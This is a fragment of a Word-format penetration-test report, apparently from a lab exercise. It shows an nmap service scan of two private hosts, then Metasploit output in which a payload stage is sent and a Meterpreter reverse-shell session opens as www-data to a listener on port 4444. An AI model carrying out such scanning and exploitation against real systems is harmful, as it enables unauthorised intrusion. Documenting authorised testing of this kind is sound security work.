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7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Sun Jul  7 03:45:22 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00069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Nmap scan report for 10.33.102.226</w:t>
        <w:br/>
        <w:t>Host is up (0.00076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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Sun Jul  7 03:45:30 2024 -- 2 IP addresses (2 hosts up) scanned in 7.78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Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:46564) at 2024-07-07 03:48:34 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</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ux  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt; 10.33.102.225:46564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